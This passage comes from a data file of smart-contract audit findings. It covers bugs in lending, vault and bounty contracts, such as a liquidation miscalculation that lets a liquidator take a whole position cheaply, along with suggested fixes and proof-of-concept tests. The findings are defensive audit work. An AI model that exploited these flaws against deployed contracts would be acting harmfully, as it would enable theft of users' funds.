bounds:\\n```\\n (, int256 answer, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n+ if (answer >= maxPrice or answer <= minPrice) revert();\\n```\\n",In the event that an asset crashes (i.e. LUNA) the protocol can be manipulated to give out loans at an inflated price,"```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n //@audit this pulls the Aggregator for the requested pair\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), ""Feed not found"");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n" +WIchiFarm will break after second deposit of LP,medium,"WIchiFarm.sol makes the incorrect assumption that IchiVaultLP doesn't reduce allowance when using the transferFrom if allowance is set to type(uint256).max. Looking at a currently deployed IchiVault this assumption is not true. On the second deposit for the LP token, the call will always revert at the safe approve call.\\nIchiVault\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, ""ERC20: transfer amount exceeds allowance""));\\n return true;\\n }\\n```\\n\\nThe above lines show the trasnferFrom call which reduces the allowance of the spender regardless of whether the spender is approved for type(uint256).max or not.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAs a result after the first deposit the allowance will be less than type(uint256).max. When there is a second deposit, the reduced allowance will trigger a safeApprove call.\\n```\\nfunction safeApprove(\\n IERC20Upgradeable token,\\n address spender,\\n uint256 value\\n) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n ""SafeERC20: approve from non-zero to non-zero allowance""\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n}\\n```\\n\\nsafeApprove requires that either the input is zero or the current allowance is zero. Since neither is true the call will revert. The result of this is that WIchiFarm is effectively broken after the first deposit.","Only approve is current allowance isn't enough for call. Optionally add zero approval before the approve. Realistically it's impossible to use the entire type(uint256).max, but to cover edge cases you may want to add it.\\n```\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n- ) != type(uint256).max\\n+ ) < amount\\n ) {\\n\\n+ IERC20Upgradeable(lpToken).safeApprove(\\n+ address(ichiFarm),\\n+ 0\\n );\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n```\\n",WIchiFarm is broken and won't be able to process deposits after the first.,"```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, ""ERC20: transfer amount exceeds allowance""));\\n return true;\\n }\\n```\\n" +Liquidator can take all collateral and underlying tokens for a fraction of the correct price,high,"When performing liquidation calculations, we use the proportion of the individual token's debt they pay off to calculate the proportion of the liquidated user's collateral and underlying tokens to send to them. In the event that the user has multiple types of debt, the liquidator will be dramatically overpaid.\\nWhen a position's risk rating falls below the underlying token's liquidation threshold, the position becomes liquidatable. At this point, anyone can call `liquidate()` and pay back a share of their debt, and receive a propotionate share of their underlying assets.\\nThis is calculated as follows:\\n```\\nuint256 oldShare = pos.debtShareOf[debtToken];\\n(uint256 amountPaid, uint256 share) = repayInternal(\\n positionId,\\n debtToken,\\n amountCall\\n);\\n\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n\\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\\n}\\n```\\n\\nTo summarize:\\nThe liquidator inputs a debtToken to pay off and an amount to pay\\nWe check the amount of debt shares the position has on that debtToken\\nWe call `repayInternal()`, which pays off the position and returns the amount paid and number of shares paid off\\nWe then calculate the proportion of collateral and underlying tokens to give the liquidator\\nWe adjust the liquidated position's balances, and send the funds to the liquidator\\nThe problem comes in the calculations. The amount paid to the liquidator is calculated as:\\n```\\nuint256 liqSize = (pos.collateralSize * share) / oldShare\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n```\\n\\nThese calculations are taking the total size of the collateral or underlying token. They are then multiplying it by `share / oldShare`. But `share / oldShare` is just the proportion of that one type of debt that was paid off, not of the user's entire debt pool.\\nLet's walk through a specific scenario of how this might be exploited:\\nUser deposits 1mm DAI (underlying) and uses it to borrow $950k of ETH and $50k worth of ICHI (11.8k ICHI)\\nBoth assets are deposited into the ETH-ICHI pool, yielding the same collateral token\\nBoth prices crash down by 25% so the position is now liquidatable (worth $750k)\\nA liquidator pays back the full ICHI position, and the calculations above yield `pos.collateralSize * 11.8k / 11.8k` (same calculation for the other two formulas)\\nThe result is that for 11.8k ICHI (worth $37.5k after the price crash), the liquidator got all the DAI (value $1mm) and LP tokens (value $750k)","Issue Liquidator can take all collateral and underlying tokens for a fraction of the correct price\\nAdjust these calculations to use `amountPaid / getDebtValue(positionId)`, which is accurately calculate the proportion of the total debt paid off.","If a position with multiple borrows goes into liquidation, the liquidator can pay off the smallest token (guaranteed to be less than half the total value) to take the full position, stealing funds from innocent users.","```\\nuint256 oldShare = pos.debtShareOf[debtToken];\\n(uint256 amountPaid, uint256 share) = repayInternal(\\n positionId,\\n debtToken,\\n amountCall\\n);\\n\\nuint256 liqSize = (pos.collateralSize * share) / oldShare;\\nuint256 uTokenSize = (pos.underlyingAmount * share) / oldShare;\\nuint256 uVaultShare = (pos.underlyingVaultShare * share) / oldShare;\\n\\npos.collateralSize -= liqSize;\\npos.underlyingAmount -= uTokenSize;\\npos.underlyingVaultShare -= uVaultShare;\\n\\n// // rest of codetransfer liqSize wrapped LP Tokens and uVaultShare underlying vault shares to the liquidator\\n}\\n```\\n" +The maximum size of an `ICHI` vault spell position can be arbitrarily surpassed,medium,"The maximum size of an `ICHI` vault spell position can be arbitrarily surpassed by subsequent deposits to a position due to a flaw in the `curPosSize` calculation.\\nIchi vault spell positions are subject to a maximum size limit to prevent large positions, ensuring a wide margin for liquidators and bad debt prevention for the protocol.\\nThe maximum position size is enforced in the `IchiVaultSpell.depositInternal` function and compared to the current position size `curPosSize`.\\nHowever, the `curPosSize` does not reflect the actual position size, but the amount of Ichi vault LP tokens that are currently held in the `IchiVaultSpell` contract (see L153).\\nAssets can be repeatedly deposited into an Ichi vault spell position using the `IchiVaultSpell.openPosition` function (via the `BlueBerryBank.execute` function).\\nOn the very first deposit, the `curPosSize` correctly reflects the position size. However, on subsequent deposits, the previously received Ichi `vault` LP tokens are kept in the `BlueBerryBank` contract. Thus, checking the balance of `vault` tokens in the `IchiVaultSpell` contract only accounts for the current deposit.\\nTest case\\nTo demonstrate this issue, please use the following test case:\\n```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n ).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(""should revert when exceeds max pos size due to increasing position"", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(""EXCEED_MAX_POS_SIZE""); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(""should be able to return position risk ratio"", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n\\nRun the test with the following command:\\n```\\nyarn hardhat test --grep ""should revert when exceeds max pos size due to increasing position""\\n```\\n\\nThe test case fails and therefore shows that the maximum position size can be exceeded without reverting.",Consider determining the current position size using the `bank.getPositionValue()` function instead of using the current Ichi vault LP token balance.,"The maximum position size limit can be exceeded, leading to potential issues with liquidations and bad debt accumulation.","```\\ndiff --git a/test/spell/ichivault.spell.test.ts b/test/spell/ichivault.spell.test.ts\\nindex 258d653..551a6eb 100644\\n--- a/test/spell/ichivault.spell.test.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/spell/ichivault.spell.test.ts\\n@@ -163,6 // Add the line below\\n163,26 @@ describe('ICHI Angel Vaults Spell', () => {\\n afterTreasuryBalance.sub(beforeTreasuryBalance)\\n ).to.be.equal(depositAmount.mul(50).div(10000))\\n })\\n// Add the line below\\n it(""should revert when exceeds max pos size due to increasing position"", async () => {\\n// Add the line below\\n await ichi.approve(bank.address, ethers.constants.MaxUint256);\\n// Add the line below\\n await bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(4), borrowAmount.mul(6) // Borrow 1.800e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n await expect(\\n// Add the line below\\n bank.execute(\\n// Add the line below\\n 0,\\n// Add the line below\\n spell.address,\\n// Add the line below\\n iface.encodeFunctionData(""openPosition"", [\\n// Add the line below\\n 0, ICHI, USDC, depositAmount.mul(1), borrowAmount.mul(2) // Borrow 300e6 USDC\\n// Add the line below\\n ])\\n// Add the line below\\n )\\n// Add the line below\\n ).to.be.revertedWith(""EXCEED_MAX_POS_SIZE""); // 1_800e6 // Add the line below\\n 300e6 = 2_100e6 > 2_000e6 strategy max position size limit\\n// Add the line below\\n })\\n it(""should be able to return position risk ratio"", async () => {\\n let risk = await bank.getPositionRisk(1);\\n console.log('Prev Position Risk', utils.formatUnits(risk, 2), '%');\\n```\\n" +"LP tokens cannot be valued because ICHI cannot be priced by oracle, causing all new open positions to revert",medium,"In order to value ICHI LP tokens, the oracle uses the Fair LP Pricing technique, which uses the prices of both individual tokens, along with the quantities, to calculate the LP token value. However, this process requires the underlying token prices to be accessible by the oracle. Both Chainlink and Band do not support the ICHI token, so the function will fail, causing all new positions using the IchiVaultSpell to revert.\\nWhen a new Ichi position is opened, the ICHI LP tokens are posted as collateral. Their value is assessed using the `IchiLpOracle#getPrice()` function:\\n```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n\\nThis function uses the ""Fair LP Pricing"" formula, made famous by Alpha Homora. To simplify, this uses an oracle to get the prices of both underlying tokens, and then calculates the LP price based on these values and the reserves.\\nHowever, this process requires that we have a functioning oracle for the underlying tokens. However, Chainlink and Band both do not support the ICHI token (see the links for their comprehensive lists of data feeds). As a result, the call to `base.getPrice(token0)` will fail.\\nAll prices are calculated in the `isLiquidatable()` check at the end of the `execute()` function. As a result, any attempt to open a new ICHI position and post the LP tokens as collateral (which happens in both `openPosition()` and openPositionFarm()) will revert.",There will need to be an alternate form of oracle that can price the ICHI token. The best way to accomplish this is likely to use a TWAP of the price on an AMM.,"All new positions opened using the `IchiVaultSpell` will revert when they attempt to look up the LP token price, rendering the protocol useless.\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nsherlock-admin\\nEscalate for 31 USDC\\nImpact stated is medium, since positions cannot be opened and no funds are at risk. The high severity definition as stated per Sherlock docs:\\nThis vulnerability would result in a material loss of funds and the cost of the attack is low (relative to the amount of funds lost). The attack path is possible with reasonable assumptions that mimic on-chain conditions. The vulnerability must be something that is not considered an acceptable risk by a reasonable protocol team.\\nYou've created a valid escalation for 31 USDC!\\nTo remove the escalation from consideration: Delete your comment. To change the amount you've staked on this escalation: Edit your comment (do not create a new comment).\\nYou may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.\\nhrishibhat\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nsherlock-admin\\nEscalation accepted\\nThis is a valid medium Also Given that this is an issue only for the Ichi tokens and impact is only unable to open positions.\\nThis issue's escalations have been accepted!\\nContestants' payouts and scores will be updated according to the changes made on this issue.","```\\nfunction getPrice(address token) external view override returns (uint256) {\\n IICHIVault vault = IICHIVault(token);\\n uint256 totalSupply = vault.totalSupply();\\n if (totalSupply == 0) return 0;\\n\\n address token0 = vault.token0();\\n address token1 = vault.token1();\\n\\n (uint256 r0, uint256 r1) = vault.getTotalAmounts();\\n uint256 px0 = base.getPrice(address(token0));\\n uint256 px1 = base.getPrice(address(token1));\\n uint256 t0Decimal = IERC20Metadata(token0).decimals();\\n uint256 t1Decimal = IERC20Metadata(token1).decimals();\\n\\n uint256 totalReserve = (r0 * px0) /\\n 10**t0Decimal +\\n (r1 * px1) /\\n 10**t1Decimal;\\n\\n return (totalReserve * 1e18) / totalSupply;\\n}\\n```\\n" +onlyEOAEx modifier that ensures call is from EOA might not hold true in the future,medium,"modifier `onlyEOAEx` is used to ensure calls are only made from EOA. However, EIP 3074 suggests that using `onlyEOAEx` modifier to ensure calls are only from EOA might not hold true.\\nFor `onlyEOAEx`, `tx.origin` is used to ensure that the caller is from an EOA and not a smart contract.\\n```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n\\nHowever, according to EIP 3074,\\nThis EIP introduces two EVM instructions AUTH and AUTHCALL. The first sets a context variable authorized based on an ECDSA signature. The second sends a call as the authorized account. This essentially delegates control of the externally owned account (EOA) to a smart contract.\\nTherefore, using tx.origin to ensure msg.sender is an EOA will not hold true in the event EIP 3074 goes through.",```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (isContract(msg.sender)) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n,Using modifier `onlyEOAEx` to ensure calls are made only from EOA will not hold true in the event EIP 3074 goes through.,```\\n modifier onlyEOAEx() {\\n if (!allowContractCalls && !whitelistedContracts[msg.sender]) {\\n if (msg.sender != tx.origin) revert NOT_EOA(msg.sender);\\n }\\n _;\\n }\\n```\\n +Incorrect shares accounting cause liquidations to fail in some cases,high,"Accounting mismatch when marking claimable yield against the vault's shares may cause failing liquidations.\\n`withdraw_underlying_to_claim()` distributes `_amount_shares` worth of underlying tokens (WETH) to token holders. Note that this burns the shares held by the vault, but for accounting purposes, the `total_shares` variable isn't updated.\\nHowever, if a token holder chooses to liquidate his shares, his `shares_owned` are used entirely in both `alchemist.liquidate()` and `withdrawUnderlying()`. Because the contract no longer has fewer shares as a result of the yield distribution, the liquidation will fail.\\nPOC\\nRefer to the `testVaultLiquidationAfterRepayment()` test case below. Note that this requires a fix to be applied for #2 first.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../../lib/utils/VyperDeployer.sol"";\\n\\nimport ""../IVault.sol"";\\nimport ""../IAlchemistV2.sol"";\\nimport ""../MintableERC721.sol"";\\nimport ""openzeppelin/token/ERC20/IERC20.sol"";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(""Vault"", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\n","For the `shares_to_liquidate` and `amount_to_withdraw` variables, check against the vault's current shares and take the minimum of the 2.\\nThe better fix would be to switch from marking yield claims with withdrawing WETH collateral to minting debt (alETH) tokens.",Failing liquidations as the contract attempts to burn more shares than it holds.,"```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../../lib/utils/VyperDeployer.sol"";\\n\\nimport ""../IVault.sol"";\\nimport ""../IAlchemistV2.sol"";\\nimport ""../MintableERC721.sol"";\\nimport ""openzeppelin/token/ERC20/IERC20.sol"";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(""Vault"", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\n" +when issuer set new winner by calling setTierWinner() code should reset invoice and supporting documents for that tier,medium,"if invoice or supporting documents are required to receive the winning prize then tier winner should provide them. bounty issuer or oracle would set invoice and supporting document status of a tier by calling `setInvoiceComplete()` and `setSupportingDocumentsComplete()`. bounty issuer can set tier winners by calling `setTierWinner()` but code won't reset the status of the invoice and supporting documents when tier winner changes. a malicious winner can bypass invoice and supporting document check by this issue.\\nif bounty issuer set invoice and supporting documents as required for the bounty winners in the tiered bounty, then tier winner should provide those and bounty issuer or off-chain oracle would set the status of the invoice and documents for that tier. but if issuer wants to change a tier winner and calls `setTierWinner()` code would changes the tier winner but won't reset the status of the invoice and supporting documents for the new winner. This is the `setTierWinner()` code in OpenQV1 and TieredBountyCore:\\n```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n\\nAs you can see code only sets the `tierWinner[tier]` and won't reset `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false. This would cause an issue when issuer wants to change the tier winner. these are the steps that makes the issue:\\nUserA creates tiered Bounty1 and set invoice and supporting documents as required for winners to claim their funds.\\nUserA would set User1 as winner of tier 1 and User1 completed the invoice and oracle would set `invoiceComplete[1]` = true.\\nUserA would change tier winner to User2 because User1 didn't complete supporting documents phase. now User2 is winner of tier 1 and `invoiceComplete[1]` is true and User2 only required to complete supporting documents and User2 would receive the win prize without completing the invoice phase.",set status of the `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false in `setTierWinner()` function.,malicious winner can bypass invoice and supporting document check when they are required if he is replace as another person to be winner of a tier.,"```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n" +Resizing the payout schedule with less items might revert,medium,"According to some comments in `setPayoutScheduleFixed`, reducing the number of items in the schedule is a supported use case. However in that case, the function will revert because we are iterating over as many items as there was in the previous version of the three arrays making the function revert since the new arrays have less items.\\nLet say they were 4 items in the arrays `tierWinners`, `invoiceComplete` and `supportingDocumentsComplete` and we are resizing the schedule to 3 items. Then the following function would revert because we use the length of the previous arrays instead of the new ones in the for loops.\\n```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = 